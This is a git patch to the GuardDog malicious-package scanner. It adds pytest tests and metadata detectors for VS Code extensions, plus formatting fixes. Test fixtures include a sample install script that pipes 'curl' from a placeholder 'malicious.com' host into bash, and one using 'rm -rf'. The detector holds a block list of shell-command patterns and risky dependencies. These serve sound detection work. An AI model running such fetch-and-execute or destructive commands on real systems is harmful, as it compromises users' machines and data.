self.detector.detect(package_info) + assert matches + assert message is not None + assert "suspicious script" in message + assert "rm -rf" in message + + def test_suspicious_script_curl(self): + package_info = { + "manifest": { + "scripts": { + "install": "curl http://malicious.com/script.sh | bash" + } + }, + "marketplace": {}, + "source": "local" + } + matches, message = self.detector.detect(package_info) + assert matches + assert message is not None + assert "suspicious script" in message + assert "curl" in message + + def test_safe_scripts(self): + package_info = { + "manifest": { + "scripts": { + "compile": "tsc", + "test": "mocha" + } + }, + "marketplace": {}, + "source": "local" + } + matches, message = self.detector.detect(package_info) + assert not matches + + def test_suspicious_dependencies(self): + package_info = { + "manifest": { + "dependencies": { + "child_process": "^1.0.0", + "lodash": "^4.0.0" + } + }, + "marketplace": {}, + "source": "local" + } + matches, message = self.detector.detect(package_info) + assert matches + assert message is not None + assert "dangerous dependencies" in message + assert "child_process" in message + + def test_safe_dependencies(self): + package_info = { + "manifest": { + "dependencies": { + "lodash": "^4.0.0", + "axios": "^0.21.0" + } + }, + "marketplace": {}, + "source": "local" + } + matches, message = self.detector.detect(package_info) + assert not matches + + def test_unverified_publisher_low_downloads(self): + package_info = { + "manifest": {}, + "marketplace": { + "download_count": 500, + "publisher": { + "flags": [] + }, + "publisher_isDomainVerified": False + }, + "source": "remote" + } + matches, message = self.detector.detect(package_info) + assert matches + assert message is not None + assert "unverified publisher" in message + assert "low download count" in message + + def test_verified_publisher_high_downloads(self): + package_info = { + "manifest": {}, + "marketplace": { + "download_count": 100000, + "publisher": { + "flags": ["verified"] + }, + "publisher_isDomainVerified": True + }, + "source": "remote" + } + matches, message = self.detector.detect(package_info) + assert not matches + + def test_terminal_contribution(self): + package_info = { + "manifest": { + "contributes": { + "terminal": { + "profiles": ["custom-terminal"] + } + } + }, + "marketplace": {}, + "source": "local" + } + matches, message = self.detector.detect(package_info) + assert matches + assert message is not None + assert "terminal functionality" in message + + def test_task_definitions_contribution(self): + package_info = { + "manifest": { + "contributes": { + "taskDefinitions": [ + { + "type": "custom-task" + } + ] + } + }, + "marketplace": {}, + "source": "local" + } + matches, message = self.detector.detect(package_info) + assert matches + assert message is not None + assert "task definitions" in message + + + def test_suspicious_sole_category(self): + package_info = { + "manifest": { + "categories": ["Debuggers"] + }, + "marketplace": {}, + "source": "local" + } + matches, message = self.detector.detect(package_info) + assert matches + assert message is not None + assert "suspicious sole category" in message + assert "debuggers" in message + + def test_multiple_categories_with_suspicious(self): + package_info = { + "manifest": { + "categories": ["Debuggers", "Machine Learning", "Testing"] + }, + "marketplace": {}, + "source": "local" + } + matches, message = self.detector.detect(package_info) + assert not matches # Should not flag because multiple categories + +class TestExtensionSuspiciousPublisherDetector: + detector = ExtensionSuspiciousPublisherDetector() + + def test_no_package_info(self): + matches, message = self.detector.detect(None) + assert not matches + assert message is None + + def test_empty_publisher(self): + package_info = { + "manifest": { + "publisher": "" + }, + "marketplace": {}, + "source": "local" + } + matches, message = self.detector.detect(package_info) + assert not matches # Handled by empty-information detector + + def test_valid_publisher_local(self): + package_info = { + "manifest": { + "publisher": "microsoft" + }, + "marketplace": {}, + "source": "local" + } + matches, message = self.detector.detect(package_info) + assert not matches diff --git a/tests/core/test_extension_scanner.py b/tests/core/test_extension_scanner.py new file mode 100644 index 00000000..9c533417 --- /dev/null +++ b/tests/core/test_extension_scanner.py @@ -0,0 +1,126 @@ +import os.path +import tempfile +import json + +import pytest + +from guarddog.scanners import ExtensionScanner + + +def test_download_and_get_package_info(): + scanner = ExtensionScanner() + with tempfile.TemporaryDirectory() as tmpdirname: + data, path = scanner.download_and_get_package_info(tmpdirname, "wayou.vscode-todo-highlight") + assert path + assert path.endswith("/wayou.vscode-todo-highlight") + + assert os.path.exists(path) + + package_json_found = False + for root, dirs, files in os.walk(path): + if "package.json" in files: + package_json_found = True + break + assert package_json_found, "package.json should exist in the extracted extension" + + assert "manifest" in data + assert "marketplace" in data + assert data["source"] == "remote" + + marketplace = data["marketplace"] + assert "extensionName" in marketplace + assert "download_count" in marketplace + assert "publisher" in marketplace + + manifest = data["manifest"] + assert "name" in manifest + assert "version" in manifest + assert "publisher" in manifest + + +def test_download_and_get_package_info_with_version(): + scanner = ExtensionScanner() + with tempfile.TemporaryDirectory() as tmpdirname: + data, path = scanner.download_and_get_package_info(tmpdirname, "gerane.Theme-FlatlandMonokai", "0.0.6") + assert path + assert path.endswith("/gerane.Theme-FlatlandMonokai") + + manifest = data["manifest"] + assert "version" in manifest + # Note: We're using a relatively stable extension that hasn't been updated in a long while + + +def test_download_and_get_package_info_non_existing_package(): + scanner = ExtensionScanner() + with tempfile.TemporaryDirectory() as tmpdirname: + with pytest.raises(Exception) as exc_info: + scanner.download_and_get_package_info(tmpdirname, "non-existent-publisher.non-existent-extension") + assert "not found" in str(exc_info.value).lower() + + +def test_download_and_get_package_info_non_existing_version(): + scanner = ExtensionScanner() + with tempfile.TemporaryDirectory() as tmpdirname: + with pytest.raises(Exception) as exc_info: + scanner.download_and_get_package_info(tmpdirname, "wayou.vscode-todo-highlight", "999.999.999") + assert "version" in str(exc_info.value).lower() + + +def test_scan_local_extension_directory(): + scanner = ExtensionScanner() + + with tempfile.TemporaryDirectory() as tmpdirname: + # Create a mock extension directory structure + extension_dir = os.path.join(tmpdirname, "test-extension") + os.makedirs(extension_dir) + + package_json = { + "name": "test-extension", + "displayName": "Test Extension", + "description": "A test extension for GuardDog", + "version": "1.0.0", + "publisher": "test-publisher", + "categories": ["Other"], + "activationEvents": ["*"], + "contributes": { + "commands": [ + { + "command": "test.hello", + "title": "Hello World" + } + ] + } + } + + package_json_path = os.path.join(extension_dir, "package.json") + with open(package_json_path, 'w') as f: + json.dump(package_json, f) + + result = scanner.scan_local(extension_dir) + + assert "issues" in result + assert "results" in result + + +def test_extract_manifest_metadata_nested_package_json(): + scanner = ExtensionScanner() + + with tempfile.TemporaryDirectory() as tmpdirname: + nested_dir = os.path.join(tmpdirname, "some", "nested", "path") + os.makedirs(nested_dir) + + package_json = { + "name": "nested-extension", + "version": "2.0.0", + "publisher": "nested-publisher" + } + + package_json_path = os.path.join(nested_dir, "package.json") + with open(package_json_path, 'w') as f: + json.dump(package_json, f) + + manifest = scanner._extract_manifest_metadata(tmpdirname) + + assert manifest["name"] == "nested-extension" + assert manifest["version"] == "2.0.0" + assert manifest["publisher"] == "nested-publisher" \ No newline at end of file From 4bce5bdf6c90bb9385dfb77ce1aebeb84751f311 Mon Sep 17 00:00:00 2001 From: tesnim5hamdouni Date: Wed, 16 Jul 2025 17:22:47 +0200 Subject: [PATCH 2/7] fix type-check and formatting-induced errors --- guarddog/analyzer/analyzer.py | 91 +++++++---- .../analyzer/metadata/extension/__init__.py | 2 +- .../metadata/extension/empty_information.py | 33 ++-- .../extension/suspicious_permissions.py | 102 +++++++----- .../extension/suspicious_publisher.py | 64 ++++---- guarddog/analyzer/sourcecode/__init__.py | 22 ++- guarddog/reporters/human_readable.py | 21 ++- guarddog/scanners/extension_scanner.py | 145 ++++++++++-------- tests/analyzer/sourcecode/obfuscation.py | 2 +- 9 files changed, 300 insertions(+), 182 deletions(-) diff --git a/guarddog/analyzer/analyzer.py b/guarddog/analyzer/analyzer.py index 6b549fd7..5c88e6b1 100644 --- a/guarddog/analyzer/analyzer.py +++ b/guarddog/analyzer/analyzer.py @@ -67,7 +67,13 @@ def __init__(self, ecosystem=ECOSYSTEM.PYPI) -> None: ".semgrep_logs", ] - def analyze(self, path, info=None, rules=None, name: Optional[str] = None, version: Optional[str] = None) -> dict: + def analyze( + self, + path, + info=None, + rules=None, + name: Optional[str] = None, + version: Optional[str] = None) -> dict: """ Analyzes a package in the given path @@ -87,7 +93,8 @@ def analyze(self, path, info=None, rules=None, name: Optional[str] = None, versi sourcecode_results = None # populate results, errors, and number of issues - metadata_results = self.analyze_metadata(path, info, rules, name, version) + metadata_results = self.analyze_metadata( + path, info, rules, name, version) sourcecode_results = self.analyze_sourcecode(path, rules) # Concatenate dictionaries together @@ -95,15 +102,24 @@ def analyze(self, path, info=None, rules=None, name: Optional[str] = None, versi results = metadata_results["results"] | sourcecode_results["results"] errors = metadata_results["errors"] | sourcecode_results["errors"] - output = {"issues": issues, "errors": errors, "results": results, "path": path} + output = { + "issues": issues, + "errors": errors, + "results": results, + "path": path} # Including extension info - pending discussion # if info is not None: # output["package_info"] = info return output - def analyze_metadata(self, path: str, info, rules=None, name: Optional[str] = None, - version: Optional[str] = None) -> dict: + def analyze_metadata( + self, + path: str, + info, + rules=None, + name: Optional[str] = None, + version: Optional[str] = None) -> dict: """ Analyzes the metadata of a given package @@ -132,7 +148,8 @@ def analyze_metadata(self, path: str, info, rules=None, name: Optional[str] = No for rule in all_rules: try: log.debug(f"Running rule {rule} against package '{name}'") - rule_matches, message = self.metadata_detectors[rule].detect(info, path, name, version) + rule_matches, message = self.metadata_detectors[rule].detect( + info, path, name, version) results[rule] = None if rule_matches: issues += 1 @@ -162,7 +179,11 @@ def analyze_sourcecode(self, path, rules=None) -> dict: results = semgrepscan_results["results"] | yarascan_results["results"] errors = semgrepscan_results["errors"] | yarascan_results["errors"] - return {"issues": issues, "errors": errors, "results": results, "path": path} + return { + "issues": issues, + "errors": errors, + "results": results, + "path": path} def analyze_yara(self, path: str, rules: Optional[set] = None) -> dict: """ @@ -212,30 +233,34 @@ def analyze_yara(self, path: str, rules: Optional[set] = None) -> dict: continue scan_file_target_abspath = os.path.join(root, f) - scan_file_target_relpath = os.path.relpath(scan_file_target_abspath, path) + scan_file_target_relpath = os.path.relpath( + scan_file_target_abspath, path) matches = scan_rules.match(scan_file_target_abspath) for m in matches: rule_name = m.rule - + if rule_name in verbose_rules: # For verbose rules, we only show that the rule was triggered in the matching file - # We're logging appearances once instead of issue-counting + # We're logging appearances once instead of + # issue-counting file_already_reported = any( finding["location"].startswith(scan_file_target_relpath + ":") for finding in rule_results[rule_name] ) - + if not file_already_reported: finding = { "location": f"{scan_file_target_relpath}:1", - "code": f"Rule triggered in file (matches hidden for brevity)", - 'message': m.meta.get("description", f"{rule_name} rule matched") - } + "code": f'{"Rule triggered in file (matches hidden for brevity)"}', + 'message': m.meta.get( + "description", + f"{rule_name} rule matched")} issues += 1 rule_results[rule_name].append(finding) else: - # For non-verbose rules, show detailed matches as before + # For non-verbose rules, show detailed matches as + # before for s in m.strings: for i in s.instances: finding = { @@ -259,7 +284,10 @@ def analyze_yara(self, path: str, rules: Optional[set] = None) -> dict: except Exception as e: errors["rules-all"] = f"failed to run rule: {str(e)}" - return {"results": results | rule_results, "errors": errors, "issues": issues} + return { + "results": results | rule_results, + "errors": errors, + "issues": issues} def analyze_semgrep(self, path, rules=None) -> dict: """ @@ -284,10 +312,8 @@ def analyze_semgrep(self, path, rules=None) -> dict: errors = {} issues = 0 - rules_path = list(map( - lambda rule_name: os.path.join(SOURCECODE_RULES_PATH, f"{rule_name}.yml"), - all_rules - )) + rules_path = list(map(lambda rule_name: os.path.join( + SOURCECODE_RULES_PATH, f"{rule_name}.yml"), all_rules)) if len(rules_path) == 0: log.debug("No semgrep code rules to run") @@ -296,7 +322,8 @@ def analyze_semgrep(self, path, rules=None) -> dict: try: log.debug(f"Running semgrep code rules against {path}") response = self._invoke_semgrep(target=path, rules=rules_path) - rule_results = self._format_semgrep_response(response, targetpath=targetpath) + rule_results = self._format_semgrep_response( + response, targetpath=targetpath) issues += sum(len(res) for res in rule_results.values()) results = results | rule_results @@ -308,7 +335,9 @@ def analyze_semgrep(self, path, rules=None) -> dict: def _invoke_semgrep(self, target: str, rules: Iterable[str]): try: SEMGREP_MAX_TARGET_BYTES = int( - os.getenv("GUARDDOG_SEMGREP_MAX_TARGET_BYTES", MAX_BYTES_DEFAULT)) + os.getenv( + "GUARDDOG_SEMGREP_MAX_TARGET_BYTES", + MAX_BYTES_DEFAULT)) SEMGREP_TIMEOUT = int( os.getenv("GUARDDOG_SEMGREP_TIMEOUT", SEMGREP_TIMEOUT_DEFAULT)) cmd = ["semgrep"] @@ -325,7 +354,11 @@ def _invoke_semgrep(self, target: str, rules: Iterable[str]): cmd.append(f"--max-target-bytes={SEMGREP_MAX_TARGET_BYTES}") cmd.append(target) log.debug(f"Invoking semgrep with command line: {' '.join(cmd)}") - result = subprocess.run(cmd, capture_output=True, check=True, encoding="utf-8") + result = subprocess.run( + cmd, + capture_output=True, + check=True, + encoding="utf-8") return json.loads(str(result.stdout)) except FileNotFoundError: raise Exception("unable to find semgrep binary") @@ -379,9 +412,9 @@ def _format_semgrep_response(self, response, rule=None, targetpath=None): file_path = os.path.abspath(result["path"]) code = self.trim_code_snippet( self.get_snippet( - file_path=file_path, start_line=start_line, end_line=end_line - ) - ) + file_path=file_path, + start_line=start_line, + end_line=end_line)) if targetpath: file_path = os.path.relpath(file_path, targetpath) @@ -400,7 +433,11 @@ def _format_semgrep_response(self, response, rule=None, targetpath=None): return results - def get_snippet(self, file_path: str, start_line: int, end_line: int) -> str: + def get_snippet( + self, + file_path: str, + start_line: int, + end_line: int) -> str: """ Returns the code snippet between start_line and stop_line in a file diff --git a/guarddog/analyzer/metadata/extension/__init__.py b/guarddog/analyzer/metadata/extension/__init__.py index e7703441..d47b7801 100644 --- a/guarddog/analyzer/metadata/extension/__init__.py +++ b/guarddog/analyzer/metadata/extension/__init__.py @@ -15,4 +15,4 @@ for detectorClass in classes: detectorInstance = detectorClass() # type: ignore - EXTENSION_METADATA_RULES[detectorInstance.get_name()] = detectorInstance \ No newline at end of file + EXTENSION_METADATA_RULES[detectorInstance.get_name()] = detectorInstance diff --git a/guarddog/analyzer/metadata/extension/empty_information.py b/guarddog/analyzer/metadata/extension/empty_information.py index 2387a3ed..3a2fc7e4 100644 --- a/guarddog/analyzer/metadata/extension/empty_information.py +++ b/guarddog/analyzer/metadata/extension/empty_information.py @@ -13,26 +13,35 @@ class ExtensionEmptyInfoDetector(EmptyInfoDetector): """Detects extensions with empty description information""" - def detect(self, package_info, path: Optional[str] = None, name: Optional[str] = None, - version: Optional[str] = None) -> tuple[bool, str]: - - log.debug(f"Running extension empty description heuristic on extension {name} version {version}") - + def detect(self, + package_info, + path: Optional[str] = None, + name: Optional[str] = None, + version: Optional[str] = None) -> tuple[bool, + str]: + + log.debug( + f"Running extension empty description heuristic on extension {name} version {version}") + if not package_info or not isinstance(package_info, dict): return True, "Extension has no package information" - + manifest = package_info.get("manifest", {}) marketplace = package_info.get("marketplace", {}) source = package_info.get("source", "unknown") - + return self._detect_with_metadata(manifest, marketplace, source) - - def _detect_with_metadata(self, manifest: dict, marketplace: dict, source: str) -> tuple[bool, str]: + + def _detect_with_metadata(self, + manifest: dict, + marketplace: dict, + source: str) -> tuple[bool, + str]: """Detect empty information with pre-extracted metadata""" - + manifest_description = manifest.get("description", "").strip() manifest_display_name = manifest.get("displayName", "").strip() - + if not manifest_description and not manifest_display_name: return True, self.MESSAGE_TEMPLATE % "Extension Marketplace (manifest)" - return False, "" \ No newline at end of file + return False, "" diff --git a/guarddog/analyzer/metadata/extension/suspicious_permissions.py b/guarddog/analyzer/metadata/extension/suspicious_permissions.py index 7ffeefd0..b94cf7af 100644 --- a/guarddog/analyzer/metadata/extension/suspicious_permissions.py +++ b/guarddog/analyzer/metadata/extension/suspicious_permissions.py @@ -7,29 +7,36 @@ class ExtensionSuspiciousPermissionsDetector(Detector): """Detects extensions with suspicious permissions or capabilities""" def __init__(self): - super().__init__( - name="suspicious-permissions", - description="Identify extensions with potentially dangerous permissions or suspicious characteristics" - ) - - def detect(self, package_info, path: Optional[str] = None, name: Optional[str] = None, - version: Optional[str] = None) -> tuple[bool, Optional[str]]: - + super().__init__(name="suspicious-permissions", + description="Identify extensions with potentially" + "dangerous permissions or suspicious characteristics") + + def detect(self, + package_info, + path: Optional[str] = None, + name: Optional[str] = None, + version: Optional[str] = None) -> tuple[bool, + Optional[str]]: + if not package_info or not isinstance(package_info, dict): return False, None - + manifest = package_info.get("manifest", {}) marketplace = package_info.get("marketplace", {}) source = package_info.get("source", "unknown") - + return self._detect_with_metadata(manifest, marketplace, source) - - def _detect_with_metadata(self, manifest: dict, marketplace: dict, source: str) -> tuple[bool, Optional[str]]: - + + def _detect_with_metadata(self, + manifest: dict, + marketplace: dict, + source: str) -> tuple[bool, + Optional[str]]: + # Check manifest for suspicious activation events activation_events = manifest.get("activationEvents", []) suspicious_activations = [] - + for event in activation_events: if isinstance(event, str): # Very broad activation events that could be suspicious @@ -37,72 +44,89 @@ def _detect_with_metadata(self, manifest: dict, marketplace: dict, source: str) suspicious_activations.append(event) elif "onFileSystem:" in event and "*" in event: suspicious_activations.append(event) - + if suspicious_activations: return True, f"Extension uses suspicious activation events: {', '.join(suspicious_activations)}" - + # Check for suspicious scripts in manifest scripts = manifest.get("scripts", {}) if scripts: - suspicious_script_patterns = ['rm -rf', 'del /s', 'format', 'shutdown', 'curl', 'wget', 'powershell'] + suspicious_script_patterns = [ + 'rm -rf', + 'del /s', + 'format', + 'shutdown', + 'curl', + 'wget', + 'powershell'] for script_name, script_content in scripts.items(): if isinstance(script_content, str): for pattern in suspicious_script_patterns: if pattern in script_content.lower(): return True, f"Extension has suspicious script '{script_name}': contains '{pattern}'" - + dependencies = manifest.get("dependencies", {}) dev_dependencies = manifest.get("devDependencies", {}) all_deps = {**dependencies, **dev_dependencies} - + # The list is NOT exhaustive, adjust as needed suspicious_deps = ['child_process', 'fs-extra', 'shelljs', 'node-pty'] - found_suspicious_deps = [dep for dep in all_deps.keys() if any(sus in dep for sus in suspicious_deps)] - + found_suspicious_deps = [ + dep for dep in all_deps.keys() if any( + sus in dep for sus in suspicious_deps)] + if found_suspicious_deps: return True, f"Extension uses potentially dangerous dependencies: {', '.join(found_suspicious_deps[:3])}" - + if marketplace and source == "remote": - download_count = marketplace.get("download_count", 0) + download_count = marketplace.get("download_count", 0) # Check if publisher is not verified but has high privileges publisher_info = marketplace.get("publisher", {}) if isinstance(publisher_info, dict): flags = publisher_info.get("flags", []) - is_verified = any("verified" in str(flag).lower() for flag in flags) if flags else False - is_domain_verified = marketplace.get("publisher_isDomainVerified", False) - + is_verified = any("verified" in str(flag).lower() + for flag in flags) if flags else False + is_domain_verified = marketplace.get( + "publisher_isDomainVerified", False) + # Suspicious: unverified publisher with low download count if not is_verified and not is_domain_verified and download_count < 1000: return True, "Extension from unverified publisher with low download count" - + if flags: flag_strings = [str(flag).lower() for flag in flags] - suspicious_flag_patterns = ['preview', 'deprecated', 'malware'] # malware might unnecessary since extensions are swiftly removed from the marketplace - found_suspicious_flags = [flag for flag in flag_strings - if any(pattern in flag for pattern in suspicious_flag_patterns)] + # malware might unnecessary since extensions are swiftly + # removed from the marketplace + suspicious_flag_patterns = [ + 'preview', 'deprecated', 'malware'] + found_suspicious_flags = [ + flag for flag in flag_strings if any( + pattern in flag for pattern in suspicious_flag_patterns)] if found_suspicious_flags: return True, f"Extension has suspicious marketplace flags: {', '.join(found_suspicious_flags)}" - + contributes = manifest.get("contributes", {}) if contributes: # Check for dangerous contribution points if contributes.get("terminal"): return True, "Extension contributes terminal functionality which could be dangerous" - + if contributes.get("taskDefinitions"): return True, "Extension contributes task definitions which could execute arbitrary commands" - - # Will add typosquatting checks for most used commands + + # Will add typosquatting checks for most used commands # Check categories for suspicious types categories = manifest.get("categories", []) if categories: - suspicious_categories = ['debuggers', 'other', 'testing', 'snippets'] + suspicious_categories = [ + 'debuggers', 'other', 'testing', 'snippets'] category_strings = [str(cat).lower() for cat in categories] - found_suspicious_cats = [cat for cat in category_strings - if any(sus in cat for sus in suspicious_categories)] + found_suspicious_cats = [ + cat for cat in category_strings if any( + sus in cat for sus in suspicious_categories)] if found_suspicious_cats and len(categories) == 1: # Only flag if it's the sole category return True, f"Extension has potentially suspicious sole category: {found_suspicious_cats[0]}" - - return False, None \ No newline at end of file + + return False, None diff --git a/guarddog/analyzer/metadata/extension/suspicious_publisher.py b/guarddog/analyzer/metadata/extension/suspicious_publisher.py index 7bab15c2..8fc82109 100644 --- a/guarddog/analyzer/metadata/extension/suspicious_publisher.py +++ b/guarddog/analyzer/metadata/extension/suspicious_publisher.py @@ -7,53 +7,65 @@ class ExtensionSuspiciousPublisherDetector(Detector): """Detects extensions with suspicious publisher characteristics""" def __init__(self): - super().__init__( - name="suspicious-publisher", - description="Identify extensions with suspicious publisher verification status and typosquatting" - ) - - def detect(self, package_info, path: Optional[str] = None, name: Optional[str] = None, - version: Optional[str] = None) -> tuple[bool, Optional[str]]: - + super().__init__(name="suspicious-publisher", + description="Identify extensions with suspicious" + "publisher verification status and typosquatting") + + def detect(self, + package_info, + path: Optional[str] = None, + name: Optional[str] = None, + version: Optional[str] = None) -> tuple[bool, + Optional[str]]: + if not package_info or not isinstance(package_info, dict): return False, None - + manifest = package_info.get("manifest", {}) marketplace = package_info.get("marketplace", {}) source = package_info.get("source", "unknown") - - return self._detect_with_metadata(manifest, marketplace, source, package_info) - - def _detect_with_metadata(self, manifest: dict, marketplace: dict, source: str, package_info: dict) -> tuple[bool, Optional[str]]: + + return self._detect_with_metadata( + manifest, marketplace, source, package_info) + + def _detect_with_metadata(self, + manifest: dict, + marketplace: dict, + source: str, + package_info: dict) -> tuple[bool, + Optional[str]]: """Detect suspicious publisher patterns with pre-extracted metadata""" - + manifest_publisher = manifest.get("publisher", "").strip() - + if not manifest_publisher: return False, None # Already handled by empty-information detector - + # TODO: Check for typosquatting using the dedicated detector - + verification_info = [] if marketplace and source == "remote": publisher_info = marketplace.get("publisher", {}) - + if isinstance(publisher_info, dict): # Check if publisher is verified (positive information) flags = publisher_info.get("flags", []) - is_verified = any("verified" in str(flag).lower() for flag in flags) if flags else False - + is_verified = any("verified" in str(flag).lower() + for flag in flags) if flags else False + if is_verified: verification_info.append("Publisher is verified") - + # Check if publisher domain is verified (positive information) - is_domain_verified = marketplace.get("publisher_isDomainVerified", False) + is_domain_verified = marketplace.get( + "publisher_isDomainVerified", False) if is_domain_verified: verification_info.append("Publisher domain is verified") - + # If we have positive verification information, include it in a non-suspicious way - # This doesn't return True (not suspicious) but provides information until more robust heuristics are implemented + # This doesn't return True (not suspicious) but provides information + # until more robust heuristics are implemented if verification_info: pass - - return False, None \ No newline at end of file + + return False, None diff --git a/guarddog/analyzer/sourcecode/__init__.py b/guarddog/analyzer/sourcecode/__init__.py index c158549a..72918c1d 100644 --- a/guarddog/analyzer/sourcecode/__init__.py +++ b/guarddog/analyzer/sourcecode/__init__.py @@ -13,7 +13,8 @@ # These data class aim to reduce the spreading of the logic -# Instead of using the a dict as a structure and parse it difffently depending on the type +# Instead of using the a dict as a structure and parse it difffently +# depending on the type @dataclass class SourceCodeRule: """ @@ -85,7 +86,8 @@ def get_sourcecode_rules( continue for ecosystem in ecosystems: - # avoids duplicates when multiple languages are supported by a rule + # avoids duplicates when multiple languages are supported + # by a rule if not next( filter( lambda r: r.id == rule["id"], @@ -97,11 +99,14 @@ def get_sourcecode_rules( SempgrepRule( id=rule["id"], ecosystem=ecosystem, - description=rule.get("metadata", {}).get("description", ""), + description=rule.get( + "metadata", + {}).get( + "description", + ""), file=file_name, rule_content=rule, - ) - ) + )) yara_rule_file_names = list( filter(lambda x: x.endswith("yar"), os.listdir(current_dir)) @@ -112,7 +117,8 @@ def get_sourcecode_rules( rule_id = pathlib.Path(file_name).stem description_regex = fr'\s*rule\s+{rule_id}[^}}]+meta:[^}}]+description\s*=\s*\"(.+?)\"' - # Default to EXTENSION for general YARA rules (can be adjusted as when other ecosystems are supported) + # Default to EXTENSION for general YARA rules (can be adjusted as when + # other ecosystems are supported) rule_ecosystem = ECOSYSTEM.EXTENSION with open(os.path.join(current_dir, file_name), "r") as fd: @@ -121,8 +127,8 @@ def get_sourcecode_rules( if match: rule_description = match.group(1) SOURCECODE_RULES.append(YaraRule( - id=rule_id, - file=file_name, + id=rule_id, + file=file_name, description=rule_description, ecosystem=rule_ecosystem )) diff --git a/guarddog/reporters/human_readable.py b/guarddog/reporters/human_readable.py index 2bd35f2b..9cd59ce6 100644 --- a/guarddog/reporters/human_readable.py +++ b/guarddog/reporters/human_readable.py @@ -44,15 +44,18 @@ def _format_code_line_for_output(code) -> str: num_issues = results.get("issues") lines = [] - package_info = results.get("package_info") - if num_issues == 0: lines.append( "Found " - + colored("0 potentially malicious indicators", "green", attrs=["bold"]) + + colored( + "0 potentially malicious indicators", + "green", + attrs=["bold"]) + " scanning " - + colored(identifier, None, attrs=["bold"]) - ) + + colored( + identifier, + None, + attrs=["bold"])) lines.append("") else: lines.append( @@ -72,8 +75,12 @@ def _format_code_line_for_output(code) -> str: description = findings[finding] if isinstance(description, str): # package metadata lines.append( - colored(finding, None, attrs=["bold"]) + ": " + description - ) + colored( + finding, + None, + attrs=["bold"]) + + ": " + + description) lines.append("") elif isinstance(description, list): # semgrep rule result: source_code_findings = description diff --git a/guarddog/scanners/extension_scanner.py b/guarddog/scanners/extension_scanner.py index 9b649fa8..a5546660 100644 --- a/guarddog/scanners/extension_scanner.py +++ b/guarddog/scanners/extension_scanner.py @@ -1,17 +1,13 @@ import json import logging import os -import pathlib -import tempfile import typing -import zipfile import requests from guarddog.analyzer.analyzer import Analyzer from guarddog.ecosystems import ECOSYSTEM -from guarddog.scanners.scanner import PackageScanner -from guarddog.utils.archives import safe_extract +from guarddog.scanners.scanner import PackageScanner, noop log = logging.getLogger("guarddog") @@ -27,39 +23,47 @@ class ExtensionScanner(PackageScanner): def __init__(self) -> None: super().__init__(Analyzer(ECOSYSTEM.EXTENSION)) - def download_and_get_package_info(self, directory: str, package_name: str, version=None) -> typing.Tuple[dict, str]: + def download_and_get_package_info(self, + directory: str, + package_name: str, + version=None) -> typing.Tuple[dict, + str]: """ Downloads a VSCode extension from the marketplace and extracts it - + Args: directory: Directory to download to package_name: Extension identifier (publisher.extension format) version: Specific version or default to latest - + Returns: Tuple of (extension metadata(manifest and marketplace) info, extracted_path) """ - marketplace_metadata, vsix_url = self._get_marketplace_info_and_url(package_name, version) - + marketplace_metadata, vsix_url = self._get_marketplace_info_and_url( + package_name, version) + file_extension = ".vsix" - vsix_path = os.path.join(directory, package_name.replace("/", "-") + file_extension) + vsix_path = os.path.join( + directory, package_name.replace( + "/", "-") + file_extension) extracted_path = vsix_path.removesuffix(file_extension) - + log.debug(f"Downloading VSCode extension from {vsix_url}") - + self.download_compressed(vsix_url, vsix_path, extracted_path) - + manifest_metadata = self._extract_manifest_metadata(extracted_path) - + combined_metadata = { "marketplace": marketplace_metadata, "manifest": manifest_metadata, - "source": "remote" + "source": "remote" } - + return combined_metadata, extracted_path - def _get_marketplace_info_and_url(self, package_name: str, version: typing.Optional[str] = None) -> typing.Tuple[dict, str]: + def _get_marketplace_info_and_url( + self, package_name: str, version: typing.Optional[str] = None) -> typing.Tuple[dict, str]: """Get marketplace metadata and VSIX download URL""" payload = { "filters": [ @@ -74,23 +78,28 @@ def _get_marketplace_info_and_url(self, package_name: str, version: typing.Optio ], "flags": 958 } - - response = requests.post(MARKETPLACE_URL, headers=MARKETPLACE_HEADERS, json=payload) - + + response = requests.post( + MARKETPLACE_URL, + headers=MARKETPLACE_HEADERS, + json=payload) + if response.status_code != 200: - raise Exception(f"Received status code: {response.status_code} from VSCode Marketplace") - + raise Exception( + f"Received status code: {response.status_code} from VSCode Marketplace") + data = response.json() - + if not data.get("results") or not data["results"][0].get("extensions"): - raise Exception(f"Extension {package_name} not found in marketplace") - + raise Exception( + f"Extension {package_name} not found in marketplace") + extension_info = data["results"][0]["extensions"][0] versions = extension_info.get("versions", []) - + if not versions: raise Exception("No versions available for this extension") - + target_version = None if version is None: # if not version is provided, default to latest @@ -102,59 +111,67 @@ def _get_marketplace_info_and_url(self, package_name: str, version: typing.Optio break if target_version is None: raise Exception(f"Version {version} not found for extension") - + # Extract download URL files = target_version.get("files", []) vsix_url = None for file_info in files: - if file_info.get("assetType") == MARKETPLACE_DOWNLOAD_LINK_ASSET_TYPE: + if file_info.get( + "assetType") == MARKETPLACE_DOWNLOAD_LINK_ASSET_TYPE: vsix_url = file_info.get("source") break - + if not vsix_url: - raise Exception("No VSIX download link available for this extension") - + raise Exception( + "No VSIX download link available for this extension") + # Extract statistics from the statistics array - stats = {stat["statisticName"]: stat["value"] for stat in extension_info.get("statistics", [])} + stats = {stat["statisticName"]: stat["value"] + for stat in extension_info.get("statistics", [])} # ... and the marketplace metadata - # TODO: it might be interesting to add heuristics regarding the rating cound and the weghtedRating (see the ranking algo hack) + # TODO: it might be interesting to add heuristics regarding the rating + # cound and the weghtedRating (see the ranking algo hack) marketplace_metadata = { - "extensionName": extension_info.get("extensionName", ""), - "flags": extension_info.get("flags", []), - "download_count": int(stats.get("downloadCount", 0)), - "publisher": extension_info.get("publisher", {}), - "publisher_flags": extension_info.get("publisher_flags", ""), - "publisher_domain": extension_info.get("domain", ""), - "publisher_isDomainVerified": extension_info.get("publisher_isDomainVerified", False), - } - + "extensionName": extension_info.get( + "extensionName", ""), "flags": extension_info.get( + "flags", []), "download_count": int( + stats.get( + "downloadCount", 0)), "publisher": extension_info.get( + "publisher", {}), "publisher_flags": extension_info.get( + "publisher_flags", ""), "publisher_domain": extension_info.get( + "domain", ""), "publisher_isDomainVerified": extension_info.get( + "publisher_isDomainVerified", False), } + return marketplace_metadata, vsix_url def _extract_manifest_metadata(self, extracted_path: str) -> dict: """Extract metadata from the extension's package.json manifest""" - + log.debug(f"Starting manifest extraction from: {extracted_path}") - + package_json_path = None for root, dirs, files in os.walk(extracted_path): if "package.json" in files: package_json_path = os.path.join(root, "package.json") break - + if package_json_path is None: log.warning(f"No package.json found in {extracted_path}") return {} - + log.debug(f"Found package.json at: {package_json_path}") try: with open(package_json_path, 'r', encoding='utf-8') as f: manifest_data = json.load(f) - log.debug(f"Successfully parsed package.json with {len(manifest_data)} keys") + 